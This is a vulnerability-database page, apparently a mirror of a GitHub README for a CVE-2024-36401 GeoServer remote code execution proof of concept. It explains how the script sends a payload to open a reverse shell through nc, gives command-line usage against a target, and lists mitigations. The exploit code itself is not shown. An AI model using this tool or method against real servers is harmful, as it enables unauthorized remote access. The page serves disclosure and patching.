漏洞平台

POC详情： 17ac9fbc0128242800ea403237e8d2dcbf39eacc

来源

https://github.com/bigb0x/CVE-2024-36401

关联漏洞

标题： GeoServer 安全漏洞 (CVE-2024-36401)
描述：GeoServer是一个用 Java 编写的开源软件服务器。允许用户共享和编辑地理空间数据。 GeoServer 存在安全漏洞，该漏洞源于不安全地将属性名称解析为 XPath 表达式，可能导致远程代码执行。

描述

POC for CVE-2024-36401. This POC will attempt to establish a reverse shell from the vlun targets.

介绍

# RCE for CVE-2024-36401
POC for CVE-2024-36401 GeoServer. This POC will attempt to establish a reverse system shell from the targets.


![Banner](screens/screen.jpg)


## Overview

POC for CVE-2024-36401: RCE for GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer. This POC is based on the security advisory by [phith0n](https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401).


## How it Works

1. Sets up a listener on your machine for incoming reverse shell from the target.
2. This POC will send a post request with the payloads.
3. Attempts to establish a shell on the target server.
4. This technique assumes nc is installed on the target.

## How to Use

This POC will attempt to establish a reverse shell from the vlun targets. This is aimed to work against vlun Linux targets. You will have to have a machine with published and accessiable IP in order to run this poc.


### Minimum Requirements

- Python 3.6 or higher
- `requests` library
  
To use this POC against a single target:
```sh
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
```

Help:
```sh
python3 CVE-2024-36401.py  -h

options:
  -h, --help  show this help message and exit
  -u U        Target, example https://target:8080
  -ip IP      Your IP, example 192.168.1.1
  -port PORT  Port, example 1337
  -type TYPE  Type, example sf:archsites
```

## How to Protect Your GeoServer Appliance

1- Disable WFS requests.

2- Secure your linux by configuring iptables to disable reverse connections, set default policies to drop all traffic, allow established and related connections, and permit only essential outbound traffic like DNS, HTTP, and HTTPS

3- Or upgrade to the latest version of GeoServer. 


## Contact

For any suggestions or thoughts, please get in touch with [me](https://x.com/MohamedNab1l).


## Disclaimer

I like to create my own tools for fun, work and educational purposes only. I do not support or encourage hacking or unauthorized access to any system or network. Please use my tools responsibly and only on systems where you have clear permission to test.

文件快照


 [4.0K]  /data/pocs/17ac9fbc0128242800ea403237e8d2dcbf39eacc
├── [8.9K]  cve-2024-36401.py
├── [2.1K]  README.md
└── [4.0K]  screens
    └── [259K]  screen.jpg

1 directory, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。